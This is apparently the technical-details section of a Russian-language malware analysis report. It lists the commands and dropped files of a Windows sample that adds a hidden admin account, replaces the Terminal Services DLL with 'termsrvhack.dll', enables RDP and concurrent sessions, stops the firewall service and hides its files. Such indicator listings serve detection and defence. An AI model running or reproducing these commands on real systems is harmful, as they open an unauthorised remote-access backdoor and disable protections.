Техническая информация
- 'C:\CHAdmin.exe' ghost$ admin888
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v serviceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvhack.dll /f
- '<SYSTEM32>\attrib.exe' +h +s +r <SYSTEM32>\dllcache\termsrvhack.dll
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\control\terminal" "server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\svchost.exe' -k DComLaunch
- '<SYSTEM32>\attrib.exe' +h +s +r <SYSTEM32>\termsrvhack.dll
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\wscript.exe' "c:\3389.vbs"
- '<SYSTEM32>\cmd.exe' /c ""c:\3389.bat" /start"
- '<SYSTEM32>\ntsd.exe' -c q -p 848
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\findstr.exe' /i "TermService" pid.txt
- <SYSTEM32>\svchost.exe
- C:\pid.txt
- C:\result.txt
- <SYSTEM32>\dllcache\termsrvhack.dll
- C:\3389.bat
- C:\3389.vbs
- C:\CHAdmin.exe
- C:\termsrvhack.dll
- <SYSTEM32>\dllcache\termsrvhack.dll
- C:\CHAdmin.exe
- C:\3389.vbs
- C:\result.txt
- C:\pid.txt
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'